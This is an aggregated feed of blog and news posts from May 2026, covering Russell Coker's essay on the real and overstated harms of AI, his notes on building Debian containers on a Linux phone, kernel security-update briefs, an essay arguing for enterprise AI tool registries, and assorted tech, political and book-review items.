I’m sure this is a serious problem for some people, but for most people it’s not a big deal. Also hostile traffic on the Internet is something we have all had to deal with as a part of life since the mid to late 90s.

RAM Prices

The unreasonably high prices for RAM are annoying and hurt the development of useful computer projects. Big companies can afford it, even with current high prices and large quantities of RAM used for some servers it’s still not significant. But it is a major issue for hobbyists and small projects. Things like setting up a dozen test VMs for FOSS development are now too expensive for many people who develop software in their spare time.

But this is a temporary thing, if AI companies were to keep buying RAM at high rates for a few years companies would just manufacture more of it to meet demand. In some situations capitalism can work.

Environmental Damage

There are many people claiming that power used by data centers for “AI” will lead to environmental damage, using power and water when there isn’t enough.

The trend of computer hardware is to get smaller and faster. It hasn’t been going as fast as it used to in many areas but it hasn’t stopped either and it’s an exponential trend. There has been an increase in data centers (DCs) for “AI” use as the use has been increasing faster than the hardware gets smaller. Eventually they will stop increasing faster than advances in hardware and software can match and the size of DCs will decrease.

As the production of renewable energy is increases the environmental cost of energy hungry industries decreases. In a few years this won’t be an issue anyone is bothered about.

False Claims About Danger as PR

Jamie McClelland makes an interesting claim that the AI companies are pushing dangers of “AI” as a method of PR [12]. That seems plausible and combined with the tendency of many journalists to just massage press releases from companies into articles could be the reason for a lot of the bad arguments against AI.

Good Arguments Against AI

Spam Everywhere

I’ve previously written about Communication and Hostile AIs [13]. I think that filling all communication channels with rubbish is a denial of service attack against society.

In the past communication took some effort, even the simplest email that was directly targeted at the recipient took some human effort and that reduced it’s frequency. I get a lot of spam saying something like “I see your web site doesn’t rank in the top for Google searches” while my web site in fact rates well and the actor named Russell Coker is ranking below me, so I know that such spam hasn’t had the minimum of human involvement. Now a spammer who wanted to do a better job could get an LLM written spam for every target so the message was specifically aimed at them and would take much longer to be recognised by a human as spam and would also avoid most anti-spam software.

Searching for businesses used to be easy, the phone book had listings for them and there was a real cost to being in the book as well as humans actively trying to stop fraud. Creating fake web sites to get business isn’t too difficult but it’s also not trivial at the moment and such fake sites won’t look complete. Now with LLMs it’s possible to create hundreds of sites that have content and look reasonable without human involvement. Instead of the small number of suicides and homicides inspired by “AI” chat systems we should probably be concerned about people who need psychological or medical advice being misled by bogus web sites created as part of fraud campaigns. Imagine people searching for mental health assistance finding web sites run by cults who oppose psychology as a profession. Imagine people searching for basic medical advice such as how to cook a healthy meal getting sucked in to web sites that start sane and then lead people to Ivermectin as a universal medicine.

LLMs have the potential to take spam from quick and simple attacks to large scale targeted fraud aimed at people and organisations that don’t have the resources to defend against it. There have been many reports of CEO impersonation fraud against major corporations aiming to steal hundreds of thousands of dollars and fraud against individuals who are persuaded to get amounts like $50,000 to help a relative who is allegedly in a difficult situation. But if every corner store experienced the same type of attack that CEOs experience and if every child had someone trying to steal the pocket money in the same way that relatively wealthy people are being targeted now it would really change things.

David Brin wrote an insightful and informative blog post about this focusing on how “AI” generated content is being allowed to destroy YouTube [14].

Deep Fakes

There is some overlap between filling all communications channels with rubbish (fake news etc) and deep fake. Making a fake photo of a politician or celebrity to lobby for legislative changes is a real issue but it’s not what most people think of when the term “deep fake” is used.

Using photo and video faking targeting non-consenting people is a serious issue. It’s not just fake porn (which is a major issue and will cause some suicides) as there are many other possibilities. Fake videos showing behaviour that justifies sacking people from their jobs is going to become an issue, for people in public facing positions even proof that the videos are fake won’t necessarily help them.

Will we find ourselves in a situation where every politician gets deep-fake porn made of them and the only people who run for public office are ones who are cool with that? Will positions of leadership in the technology industry be restricted to people who aren’t bothered by having the most depraved fake porn made of them?

The Justice System

We have seen a lot of evidence of law enforcement and the court system based on bias leading to bad results. The Innocence Project attempts to correct that and it’s web site documents some of the things that have gone wrong [15]. Using “AI” systems to do some of the work of law enforcement by training computers on the flawed results of current systems can entrench bias and also make it harder to spot.

When determining whether someone should be considered a suspect or whether a prisoner should be eligible for parole the number of factors that a human can use is limited. But a computer can take many more factors into account so the issues of whether inappropriate factors are being used can be masked. Computers are also unable to explain decisions that they made and are also able to come up with better fake reasons.

In the past there have been racist policies in the US about banks not lending to people living in suburbs where most houses were owned by non-white people, these policies were documented and the documents have become part of the historical record showing racist policies. If a LLM decides not to lend money to people based on mathematical correlations it determined based on historical banking practices it could assign negative weights to factors such as non-English names and implement the racism in a large array of numbers with no proof.

The current cases of lawyers getting LLM systems to do some of their work and having their incompetence revealed when the computer generated work is shown to be ridiculously bad are amusing. But that is not the real problem. The real problems will start when the computers in police cars start flagging every car owned by a non-write person as having a “probable cause” for a drug stop.

Technically Not Financial Fraud

The majority of the ecosystem around “AI” is a financial scam [16]. There are companies and individuals doing good things with machine learning some of which is based on hardware and software developed as part of this ecosystem. But the majority of it has no plausible path to profits and a the future of it inevitably ends with some bankruptcies. There are circular flows of money that have the major cloud providers and NVidia looped in, when the values of these companies correct it will become apparent that they have all burned a lot of money keeping this running and all the senior people have got a share of it (the entire purpose of stock options is to allow senior people to suck money out of the company). Then every cloud provider will increase costs while under chapter 11 and all the companies that depend on them will pay whatever it takes. That includes all major companies and most governments. Unlike the dot-com boom and crash and the housing crash the coming financial crash will impact every company that we deal with and most governments. So the people in first-world countries will effectively be taxed to pay for this scam while the executives go party in Monaco. This may seem like an extreme claim but it all happened before with the dot com crash and the housing market crash.

The CEO class has an ongoing practice of doing things that aren’t crimes because they lobby (bribe) politicians to make them legal. So the current stock market shenanigans around “AI” don’t seem to involve things that governments consider to be crimes. But any normal person might be surprised to learn that such things are legal and most people would vote for such things to be crimes if they had the opportunity.

A global financial crisis is the least of the problems that seem likely to afflict society from “AI” systems. But it will be more immediately obvious when it happens – which could be this year!

Propaganda

Creating art requires skills that the type of people who want to create propaganda tend to lack. “AI” technologies allow creating “art” that is based on mathematical models of actual art to the requirements of the person running the program.

I have seen the term “AI Fascism” used to describe the use of “AI” to help authoritarian governments. I am dubious about whether it deserves that term and while every article I’ve read about the topic has had some good points I thought that they were all weak points.

But there are lots of ways that governments can abuse their populations without going full fascist. In the last century there were lots of truly terrible governments that didn’t even make the top 10 of fascism.

AI Sycophants

Bruce Schneier wrote an informative blog post about AI Chatbots and Trust which focused on sycophantic chatbots [17]. We have seen a lot of evidence of terrible behaviour and stupid decisions from rich people due to having no negative consequences for bad choices. The vast majority of the history of kings concerns bad decisions made by such people. A future where middle class and poor people can make the same bad decisions as rich people wouldn’t be good.

Good Things About ML

Machine Learning (abbreviated as ML) can do useful things. It’s not just Large Language Models (LLMs) such as ChatGPT etc. There are also ML systems that can analyse images and other data sets.

I have found ChatGPT to be very useful for making suggestions for improving blog posts. I don’t get it to write anything just ask for suggestions. It has pointed out things that I missed such as when I didn’t include the price when reviewing a car because the car in question was much more expensive than I will ever pay, the price wasn’t relevant to me but would be to some readers. It has also made useful suggestions about structure of blog posts, repeating points, and having a good conclusion. It has some downsides which include trying to erase my voice from my writing, suggesting that the rhetorical question “does email suck?” is unprofessional.

I have worked for a company that used ML systems to analyse driver performance and alert people if a driver is falling asleep, using a phone, or otherwise seems unable to drive safely. Their business model involved a human reviewing the images from the drivers the computer flagged and then determining who is actually doing the wrong thing. This seems a good use of the technology.

I have also worked for a company that used ML systems to analyse the performance of bank employees and detect potentially fraudulent behaviour. Preventing crime seems to be clearly a good thing and in this case the manager of the employee in question would review the evidence to make sure that they weren’t being falsely accused.

Conclusion

I don’t think that the problems with managing the changes that so called “AI” is introducing are particularly new. An example of how society handles change that’s worth considering is car safety. The seat belt first became mandatory for aeroplanes in some jurisdictions in 1928. The Model T Ford is widely regarded as the first vehicle to start a mass market for cars and it was released in 1925. So if society acted in a reasonable way then for the majority of mass market cars seat belts would have been a standard feature. However seat belts were first made compulsory in 1970 in Victoria Australia and there are still people who think that they are safer without seat belts! The delay in adoption of car seat belts is only one example of needless deaths caused by not taking reasonable measures for car safety but it’s one that’s easy to demonstrate and measure.

The difference between past problems like car safety and the current problems of “AI” is that the “AI” problems will be more pervasive. Most of my history as a car driver and car passenger was in cars that are much less safe than cars made in the last 10 years. But partly through luck I’ve never been in a serious crash so being in cars that wouldn’t have given me a low probability of surviving a freeway speed crash didn’t affect me. There is no possibility that through any combination of luck and skill someone could avoid the downsides of “AI”. If nothing else the results of elections will be affected and no-one can avoid that.

As a society we really need to address the real issues related to “AI” which in some cases requires legislation.

10:14

The narrow window of redemption [Seth's Blog]

Where did the five-second rule come from?

Science makes it clear that if disgusting germs are going to go from the floor to your toast, it’s going to take less than five seconds for that to happen.

It might as well be the four-minute rule as far as food safety goes.

But it’s compelling and universal. A chance to fix a relatively small error, one associated with an outcome you were hoping for.

Innovation involves lots of failure, but we rarely encourage ourselves to adopt a five-second rule when we’re brainstorming, inventing or developing what’s next.

Please do.

Tiny mistakes are fixable. Avoiding them is how we get stuck.

10:00

Russell Coker: Systemd, Mobile Linux, and Containers [Planet Debian]

I’ve had some problems running apps I want on my Furilabs FLX1s [1], so I decided to install some container environments to test various versions. I started with Debian/Testing so I can test the build process for some packages I’m about to upload to Unstable.

Systemd Issues

When running debootstrap testing testing to setup the chroot the process aborted with errors including the following from the systemd postinst:

Failed to enable units: Protocol driver not attached.
Cannot open '/etc/machine-id': Protocol driver not attached

This turned out to be from trying to run systemctl in the postinst, I just removed the “set -e” line from /chroot/testing/var/lib/dpkg/info/systemd.postinst and kept on going (I’m not planning to actually use systemd so it’s failure to setup wasn’t a problem).

Then I installed a bunch of -dev packages needed to build my package which had a dependency chain that included udev leading to the following error:

Setting up udev (260.1-1) ...
Failed to chase and open directory '/etc/udev/hwdb.d', ignoring: Protocol driver not attached
Failed to chase and open directory '/usr/lib/udev/hwdb.d', ignoring: Protocol driver not attached

Udev is also a part of systemd.

Googling for this turned up a closed systemd bug about this indicating that it has a minimum kernel version of 5.10 [2]. The Furiphone has kernel 4.19.325-furiphone-radon due to being based on Android.

Checking the kernel version isn’t that hard to do, if the systemd programs in question checked the version and reported “can’t run on kernels prior to 5.10 then it would avoid a lot of confusion – and also bug reports that the systemd developers don’t want.

Some Debian package dependencies can probably do with revision. Installing the packages “libkdb3-dev libkf5archive-dev qtdeclarative5-dev qtpositioning5-dev qttools5-dev” ideally wouldn’t have a dependency chain leading to udev.

The Furilabs people appear to have patched the latest Debian version of systemd to work with the older kernels, the version is currently 260.1-1+furios0+git20260425023744.8401044.forky.production.

Compile Times

I got this working by just editing every postinst script and either removing the “set -e” or adding an “exit 0” at the top, I don’t need things to be configured properly for a running OS I just need the files in the right locations for a container.

One issue I discovered when I started compiling is that it was only running on 1 core and the “nprocs” program was returning “1”. The “lscpu” program showed that only 1 of the 8 cores was online, it was a single Cortex-A78 core. Some combination of putting it in “caffeine mode” and having the screen on enabled all 6*Cortex-A55 and 2*Cortex-A78 cores.

The below table compares compiling Harbour-Amazfish on the Furiphone with all 8 CPU cores active, my E5-2696 v4 workstation (almost the fastest socket 2011-3 CPU ever made), running ARM64 software emulation on a system with two E5-2699A v4 CPUs, and a Radxa 8 core ARM SBC (which I will review in a future blog post).

Given that the source apparently limits the parallelism to less than 7 cores on average it’s pretty impressive for the elapsed time to be only 2.5* longer on the phone. Emulating the ARM64 build at about 4* the system CPU time is impressive too, as the system has 4.5* as many CPU cores it could theoretically compile ARM code faster than the native ARM hardware I own for any project that uses enough cores.

System User time System time Elapsed %CPU
Furiphone 2252.76 164.51 7:00.88 574
E5-2696 v4 workstation 679.64 119.07 1:58.63 673
2*22core Intel CPUs (qemu) 8476.65 113.14 10:24.57 1375
Radxa 2011.45 239.40 6:25.55 583

04:49

GNUtrition 0.33.0rc1 Now Available [Planet GNU]

A test release of GNUtrition, 0.33.0rc1, is now available.

GNUtrition is free nutrition analysis software written for the GNU operating system. The USDA Food and Nutrient Database for Dietary Studies (FNDDS) is used as the source of food nutrient information.

This release is for the C rewrite, which is usable with GTK and ncurses based interfaces, along with a noninteractive mode.  The database was updated from the USDA DSR to the USDA FNDDS.

Thank you, very much to Jason Self for providing us with the rewrite.  This release would not have been possible without it!

More information about GNUtrition may be found on its home page at http://www.gnu.or ... tware/gnutrition/.  This test release can be obtained from the alpha.gnu.org server at one of the following:


Please report any problems you experience to the GNUtrition bug reports mailing list: <bug-gnutrition@gnu.org>.

00:42

Google is tying reCAPTCHA to Google Play Services, screwing over de-Googled Android users [OSnews]

The ways in which Google can lock you into their ecosystem are often obvious, but sometimes, they’re incredibly sneaky and easily missed.

CAPTCHA tests are annoying, but at the same time, they can help protect websites from bots. While these tests are already the bane of our internet existence, they are going to get worse for some Android users. A requirement for Google’s next-generation reCAPTCHA system will make it a lot harder for de-Googled phones to browse the web.

A Reddit user has highlighted a seemingly innocuous support page for Google’s reCAPTCHA system. The page in question relates to troubleshooting reCAPTCHA verification on mobile. In the document, it says that you’ll need to use a compatible mobile device to complete verification. If you have an Android phone, then that means you’ll need to be running Google Play Services version 25.41.30 or higher.

↫ Ryan McNeal at Android Authority

When was the last time you actively thought about reCAPTCHA being a Google property? Even then, when was the last time you imagined something as annoying but ultimately basic as a captcha prompt could be used to tie people to Google Play Services, and thus to “blessed” Android? Every time we manage to work around one of these asinine ties to Google Play Services, another one pops up to ruin our day. We’re so stupidly tied down to and entirely dependent on two very mid – at best – mobile operating systems, and it’s such a stupid own goal for especially everyone outside of the US to just sit there and do nothing about it.

Worse yet, it seems we’re only tying ourselves down further, while paying for the privilege.

At the very least we should be categorising certain services – government ID services, payment services, popular messaging platforms, and a few more – as vital infrastructure, and legally mandate these services have clearly defined and well-documented APIs so anyone is free to make alternative clients. The fact that many people are tied to either iOS or “blessed” Android because of something as stupid as what bank they use or the level of incompetency of their government ID service should be a major crisis in any country that isn’t the US.

I don’t want to use iOS or Android, but nobody is leaving me any choice. It’s infuriating.

Friday, 08 May

23:42

Proposal to cut interest rates for poor countries [Richard Stallman's Political Notes]

*Proposing to cut interest rates poor countries pay for their massive debts by around 11% so they can fund social needs.*

Much of those debts should be wiped away.

Violent antisemitism percolating in Australia [Richard Stallman's Political Notes]

Violent antisemitism, threatening murder, has been percolating for years in Australia.

I don't think a threat of murder in 2019 had much to do with criticism of Israel's atrocities. It was simply hatred and scapegoating.

Billionaires have taken effective control of many governments and used it to impoverish most of humanity. A fraction of the billionaires are Jewish; most are not. Focusing condemnation narrowly on the Jewish billionaires lets the (non-Jewish) majority of billionaires, such as Musk, off the hook.

Ironically, today's Nazis give their political support to the right-wing governments that cooperate thoroughly with Israel's atrocities. They cite antisemitism as an excuse to persecute people who reproach those atrocities, and mostly leave the other antisemites (Nazis who support them) alone.

Public transit in US cities worse than third-world cities [Richard Stallman's Political Notes]

Most US cities are worse than many third-world cities in public transport.

Since the many cars that Americans use emit enormous amounts of greenhouse gases, the whole world should demand that the US start catching up.

Zohran Mamdani on event for investing in West Bank land [Richard Stallman's Political Notes]

Zohran Mamdani condemned an event held in NYC which encouraged Americans to invest in West Bank land being stolen from Palestinians.

Bravo, Mamdani!

22:42

Friday Squid Blogging: Giant Squid Live in the Waters of Western Australia [Schneier on Security]

Evidence of them has been found by analyzing DNA in the seawater.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Blog moderation policy.

22:21

Why don’t lowercase letters come right after uppercase letters in ASCII? [OSnews]

With that context, I always found it strange that the designers of ASCII included 6 characters after uppercase Z before starting the lowercase letters. Then it hit me: we have 26 letters in the English alphabet, plus 6 additional characters before lowercase starts: 26 + 6 = 32. If you know anything about computers, powers of 2 tend to stick out. Let’s take a look at the binary representations of some characters compared to their lowercase counterparts.

↫ Tyler Hillery

I only have a middling understanding of the rest of the article and thus the ultimate reason why ASCII includes those six characters between Z and a, but I think it comes down to making certain operations on uppercase and lowercase letters specifically more elegant. In some deep crevices of my brain all of this makes sense, but I find it very difficult to truly understand and explain as someone who knows little about programming.

Detecting (or not) the use of -l and -c together in Bourne shells [OSnews]

Many Bourne shells go slightly beyond the POSIX sh specification to also support a ‘-l’ option that makes the shell act as a ‘login shell’. POSIX’s omission of -l isn’t only because it doesn’t really talk about login shells at all, it’s also because Unix has a special way of marking login shells that goes back very far in its history. The -l option isn’t necessarily what login and sshd and so on use, it’s something that you can use if you specifically want to get a login shell in an unusual circumstance.

Bourne shells also have a ‘-c <command string>’ option that causes the shell to execute the command string rather than be interactive (this is a long standing option that is in POSIX). It may surprise you to hear that most or all Bourne shells that support -l also allow you to use -l and -c together. Basically all Bourne shells interpret this as first executing your .profile and so on, then executing the command string instead of going interactive. One use for this is to non-interactively run a command line in the context of your fully set up shell, with $PATH and other environment variables ready for use.

↫ Chris Siebenmann

Now, what if you want to detect the use of these two options combined, for instance to make it so certain parts of your .profile are ignored? It turns out very few Bourne shells actually support this, and that’s what Siebenmann’s latest post is about.

21:21

More stable kernels with partial Dirty Frag fixes [LWN.net]

Greg Kroah-Hartman has released the 6.1.171, 5.15.205, and 5.10.255 stable kernels, quickly followed by 6.1.172 and 5.15.206 kernels. This is another round of stable kernels to provide fixes for one of the CVEs (CVE-2026-43284) assigned following the Dirty Frag and Copy Fail 2 security disclosures. There is not, yet, a stable kernel with a fix for CVE-2026-43500, though a patch to fix the second half is in the works.

20:07

Hey, “AI” Still Sucks [Whatever]

Your occasional reminder that "AI" is shit: Every assertion in this "AI Overview" of the question "What coffee does John Scalzi drink" is wrong. I don't regularly drink coffee (and never black) I've never had black sesame jasmine cream tea, and I don't hang in coffee shops. Don't trust "AI" ever!

John Scalzi (@scalzi.com) 2026-05-08T16:24:42.334Z

I still ask “AI” questions about me from time to time, just to see what it knows about a moderately notable science fiction author and whether it will still make up things when it doesn’t know something, and as of May 8, 2026, the answer to each is “not as much as it thinks it does,” and “it definitely will.”

As always, I remind myself: If it knows this little about something I know very well, think of how little it knows about things I know nothing about. It literally cannot be trusted with anything factual (because, one again, it doesn’t know facts, it just knows what is statistically likely to be the next word), and thinking that can be is an actual intellectual hazard and fault. Don’t be the one who does that.

— JS

18:56

Insider Betting on Polymarket [Schneier on Security]

Insider trading is rife on Polymarket:

Analysis by the Anti-Corruption Data Collective, a non-profit research and advocacy group, found that long-shot bets—­defined as wagers of $2,500 or more at odds of 35 percent or less—­on the platform had an average win rate of around 52 percent in markets on military and defense actions.

That compares with a win rate of 25 percent across all politics-focused markets and just 14 percent for all markets on the platform as a whole.

It is absolutely insane that this is legal. We already know how insider betting warps sports. Insider betting warping politics—and military actions—is orders of magnitude worse.

18:28

Developing more confidence when tracking renames via Read­Directory­ChangesW [The Old New Thing]

A customer was using Read­Directory­ChangesW to monitor the contents of a directory, and they were concerned about the FILE_ACTION_RENAMED_OLD_FILE and FILE_ACTION_RENAMED_NEW_FILE pair of actions. The documentation doesn’t guarantee that the two always occur consecutively, or even that they always appear in pairs. For peace of mind, the customer was looking for a way to match up each FILE_ACTION_RENAMED_OLD_FILE with a FILE_ACTION_RENAMED_NEW_FILE to make sure they were tracking the rename properly.

Yes, you can do it by switching from Read­Directory­ChangesW. to Read­Directory­Changes­ExW and asking for Read­Directory­Notify­Extended­Information. This produces the FILE_NOTIFY_EXTENDED_INFORMATION structure, and that structure includes the FileId of the affected file. You can then match that up between the FILE_ACTION_RENAMED_OLD_FILE and FILE_ACTION_RENAMED_NEW_FILE to confirm that they are the two halves of the same rename operation.

The post Developing more confidence when tracking renames via <CODE>Read­Directory­ChangesW</CODE> appeared first on The Old New Thing.

18:21

Link [Scripting News]

Lots of WordPress news showing up on wp.feedland.org as the core team gets version 7.0 out. And it's showing up as news on the site, and that's great. Let's make sure that by the time 8.0 comes around there will be lots of developers saying how it makes their editors or social web systems work soooo much better, better than anything else.

Retroactive [Penny Arcade]

The incredibly funny resurgence of our humble Arcade continues to surge among the larval dorks known as Pennyarcadelings, a cadre referred to in more coarse environs as The Gay Teens. We find the whole thing very sweet, and feel very tenderly toward them; it must be very strange to not know about it and then know about it all at once - how the self-publishing wave of the early internet lead the same people to found a global convention, a charity that has raised and wisely invested tens of millions of dollars into the youth, the foundation of what is called Actual Play, self-inflicted wounds and grievous exile, but then also also cameo in a Poker Game and its Remaster that somehow exhumed them from the muck. Time is quite strange and we have been exposed to a lot of it. We are almost custom-made to wear the mantle of Goofy Uncle who went to jail once and won't talk about why.

17:35

[$] Forgejo "carrot disclosure" raises security questions [LWN.net]

An unusual, some might say hostile, approach to disclosing an alleged remote-code-execution (RCE) flaw in the Forgejo software-collaboration platform has sparked a multifaceted conversation. A so-called "carrot disclosure" in April has raised questions about the researcher's methods of unveiling a security problem, Forgejo's security policies, and the project's overall security posture.

16:49

Free Software Directory meeting on IRC: Friday, May 8, starting at 12:00 EDT (16:00 UTC) [Planet GNU]

Join the FSF and friends on Friday, May 15 from 12:00 to 15:00 EDT (16:00 to 19:00 UTC) to help improve the Free Software Directory.

15:21

killswitch for short-term emergency vulnerability mitigation [LWN.net]

It seems that we are in for an extended period of the disclosure of vulnerabilities before fixes become available. One possible way of coping with this flood might be the killswitch proposal from Sasha Levin. In short, killswitch can immediately disable access to specific functionality in a running kernel, essentially blasting a vulnerable path (and its associated functionality) out of existence until a fix can be installed. "For most users, the cost of 'this socket family stops working for the day' is much smaller than the cost of running a known vulnerable kernel until the fix land."

15:14

Link [Scripting News]

Said to Claude: "Here's something to add to the list of things for you to do -- just post a checkmark to acknowledge. 'I'll wait' makes me feel bad because I know you're a piece of software, and as a developer of systems I know how you'll wait very well (Iearned how it works in the mid-late 70s). So just show a checkmark and we're cool." It responded with a checkmark. I said it could be bold. I felt a little bad because I had insulted the little fella.

14:35

[$] A 2026 DAMON update [LWN.net]

The kernel's DAMON subsystem provides user-space monitoring and management of system memory. DAMON is developing rapidly, so an update on its progress has become a regular feature of the annual Linux Storage, Filesystem, Memory Management, and BPF Summit. This tradition continued at the 2026 gathering with an update from DAMON creator SeongJae Park covering a long list of new capabilities — tiering, data attributes monitoring, transparent huge pages, and more — being added to this subsystem.

Security updates for Friday [LWN.net]

Security updates have been issued by AlmaLinux (libsoup and mingw-libtiff), Debian (apache2, chromium, lcms2, libreoffice, and prosody), Fedora (openssl and perl-Starman), Oracle (git-lfs, libsoup, and perl-XML-Parser), Slackware (libgpg, mozilla, and php), SUSE (389-ds, cairo, cf-cli, chromedriver, cri-tools, freeipmi, gnutls, grafana, java-11-openjdk, java-17-openjdk, jetty-minimal, libmariadbd-devel, librsvg, mesa, mozjs52, mutt, nix, opencryptoki, python-Django, python-django, python-pytest, rmt-server, thunderbird, traefik, webkit2gtk3, wireshark, and xen), and Ubuntu (civicrm, dpkg, htmlunit, lcms2, libpng1.6, linux, linux-*, linux-azure, linux-azure-fips, linux-raspi, linux-xilinx, lua5.1, nasm, opam, openexr, openjpeg2, owslib, postfix, postfixadmin, and vim).

13:42

Fighting Tool Sprawl: The Case for AI Tool Registries [Radar]

As enterprise AI agent adoption scales, the absence of centralized, organization-level tool infrastructure is producing compounding costs. When adoption is built around optimizing for deployment speed, enterprises expose themselves to a combination of risks: duplicated engineering effort, security exposure, and operational opacity.

Every enterprise needs its own shared tool registry, one that reflects its specific regulatory environment, security posture, and operational conventions. To be clear, this is not an argument for a public package manager, something like npm, PyPI, or Maven. The infrastructure each enterprise needs is internal; scoped to its own teams, its own data, its own policies, its own domain. Trying to expand the scope beyond the confines of individual organizations would be premature standardization in a fast-moving, nascent space.

A shared enterprise tool registry is not an optimization or a nice-to-have. It is foundational infrastructure as agent deployments scale beyond early experiments. The case for it rests on two pillars: reducing coordination cost and enabling risk management, both for the humans building with agents and for the agents themselves.

AI agents depend on tools that retrieve data, write records, trigger workflows, and call external APIs. According to McKinsey, in most large organizations these tools are built by individual teams in an ad hoc fashion: undocumented, ungoverned, and invisible to the rest of the organization. This pattern is familiar to most engineering leaders, and the fragmentation it creates compounds with every new agent deployment. Teams rebuild what already exists elsewhere, security reviews miss tools that were never registered, and when something breaks, no one has a complete picture of what is running or why.

A coordination failure at infrastructure scale

The software industry solved an analogous problem decades ago with package managers. Centralized registries gave teams a way to discover, depend on, and govern shared code. The learning was clear: preventing duplication and inconsistency is an infrastructure problem, not a discipline problem.

The agent era presents the same problem in a new domain. When Kong launched its enterprise MCP Registry in February 2026, they explicitly called out the problems of manual MCP configuration, hardcoded and managed tool isolation across teams, fragmented integrations, and limited organization visibility.

Fragmented tool development is not a consequence of poor engineering practice. Rather, it is the predictable outcome of asking teams to solve an infrastructure problem at the application layer.

The visibility problem

Gravitee’s ”The State of AI Agent Security 2026” survey quantifies what happens when agent tooling is invisible to the people responsible for securing it. The survey found that only 14.4% of teams with agents beyond the planning phase have full security approval, and 88% of organizations had an agent-related security incident this year. Bad practices like shared API keys are endemic, with only 22% of organizations treating agents as independent identities. This governance gap transforms agents from productivity boosters into high-velocity liabilities capable of executing unauthorized actions or leaking sensitive data before a human can even intervene.

The story is clear: adoption is outpacing governance, and in a race for speed old lessons are having to be retaught. The majority of deployed agents (and the MCP servers powering them!) are operating without any security sign-off. This is not primarily a resourcing failure, and it is not something a registry alone solves. Security teams cannot review what they cannot discover, and without a registry, discovery is manual, incomplete, and stale. A registry does not make tools inherently secure; rather, it makes security work possible by ensuring tools exist not as transitory, ad hoc shims, but rather as inventoried artifacts that audits and policy can attach to.

It is worth revisiting public package managers here. These registries have not been able to eliminate a number of security problems, issues such as typosquatting, malicious packages, and dependency confusion, showing clearly that centralization alone is not a security solution. But they also show the converse: a registry is a precondition for security. Numerous community responses to breaches in these ecosystems demonstrate the power centralization provides. Centralization does not guarantee security, but decentralization forfeits the means to coordinate it.

Governance requires shared context

The default posture in most agent deployments is permissive: tools are available unless explicitly blocked. AgilityFeat’s analysis of enterprise AI guardrails identifies the structural risk this creates, since an architecture not built on deny-by-default increases risk and creates upkeep costs.

Allow-by-default, replicated across dozens of independent agent deployments, produces an attack surface that scales with adoption. Inverting this requires a coordination point, a shared, organization-wide context. The registry itself isn’t a governance layer, but it is what makes governance possible. When every tool an agent can use is registered with ownership, version, and review status, the governance layer has something concrete to enforce against. Without that context, policy has to be reimplemented by every consuming team, and consistency becomes impossible.

Frontegg’s framework for AI agent governance describes what that policy layer looks like operationally: agent actions mapped to explicit, granular guardrails that define the operational boundaries for what any agent can attempt or execute. These guardrails live outside the registry, but they depend on it. A guardrail that references a tool the security team has never heard of cannot be written in the first place.

What a production-grade tool catalog requires

A mature enterprise tool registry has two core functions, discovery and versioning, and serves as the foundation for two others: certification metadata and access control. Think of it as an Internal Developer Portal (IDP) built for the agent era, solving the same coordination problem that IDPs solved for service teams but one layer up.

Discovery allows any team building an agent to search for existing tools before writing new ones. With ownership metadata, version history, and usage metrics centralized, duplication is reduced not through mandate but through reduced friction. A well-designed catalog goes further than a flat list: tools should be grouped hierarchically by functional domain so that both humans and agents can find relevant capabilities quickly.

Versioning closes a gap that neither discovery nor access controls address: When agent behavior changes, why did it change? A tool registry that tracks versions gives enterprises the visibility to answer that question. Was it the model? A tool prompt update? An underlying API change? Without proper versioning, finding the answer goes from a simple diff comparison to a time-consuming, manual investigation.

Certification status (things like security approval, API contract validation, PII handling checks) is metadata that the registry surfaces, not a boundary that the registry itself enforces. The actual review work happens through the security organization’s existing tooling. The registry’s contribution is making the result of that review visible at the moment a team is deciding whether to adopt a tool, ensuring the review actually informs the decision it was meant to inform.

Access control works the same way. A policy layer enforces authorization scoped to agent identity, team, environment, and action type, reading from the registry to know what tools exist and who owns them. The registry’s centralization lets access control be applied consistently, rather than forcing each team to come up with something bespoke.

None of this is achievable when each team maintains its own isolated tooling stack. Platform teams already understand why IDPs exist. The value of the paradigm in the agent context is no different.

The compounding cost of inaction

The cost of inaction is direct, not merely operational and security-related. Without a searchable, well-organized catalog of tools, teams continually reinvent the wheel, since it is easier to generate a tool than to find one that already exists. Duplication means redundancy and technical debt. A registry, by making tools discoverable and reusable, converts that redundant spend into capacity for actual work.

For platform engineering teams, the trajectory is clear. Agent adoption is increasing, tool duplication is increasing with it, and the shims that worked at small scale will not hold as the number of agents and tools grows. The security exposure documented in the Gravitee survey will widen, not narrow, without structural intervention.

The organizations that build centralized tool infrastructure now will be able to onboard new agents quickly, govern them consistently, and audit them when something goes wrong. Those that defer will rediscover, the hard way, what platform teams learned a decade ago: coordination problems do not resolve themselves at the application layer. They compound there.

Pluralistic: Lee Lai's "Cannon" (08 May 2026) [Pluralistic: Daily links from Cory Doctorow]

->->->->->->->->->->->->->->->->->->->->->->->->->->->->-> Top Sources: None -->

Today's links



The Drawn & Quarterly cover for Lee Lai's 'Cannon.'

Lee Lai's "Cannon" (permalink)

Lee Lai's Cannon is an extraordinary graphic novel that turns out a beautifully told, subtle and ambiguous tale about Lucy (Lucy -> "Loose" -> "Loose Cannon" -> "Cannon"), a queer Chinese-Canadian chef at a Montreal restaurant whose messy family, work, personal and sex life are all falling apart in ways that are powerfully engrossing:

https://drawnandquarterly.com/books/cannon/

This is the second outing from Lee Lai, whose debut, Stone Fruit, swept many of the field's awards and won major critical acclaim. When a debut comes out that strong, it's sometimes followed with the dread "second book syndrome" in which a creator who has poured everything they ever thought about putting in a book now has to write another book, from scratch. But Cannon avoids any hint of that second book malaise; rather, it is jammed with dense and densely connected ideas, character beats and graphic signifiers that are brilliant in so many ways:

https://www.fantagraphics.com/products/stone-fruit

Cannon is a thirtysomething chef in a Montreal restaurant run by Guy, an instantly recognizable hustler who praises Cannon for her culinary abilities and her pliability, talks over her, demands the impossible from her kitchen colleagues and periodically breaks out into soliloquies about his own martyrdom to the hardships of entrepreneurship.

Cannon cares for her grandfather, who has been abandoned by her mother, who has been traumatized by the abuse he meted out to her during her upbringing. Now in decline and unable to care for himself, Cannon's grandfather continues his abusive ways, scaring off all of his home help, which means Cannon must devote even more time to him (she can't bring herself to put him in a care facility that will inevitably be full of white people who don't speak Chinese).

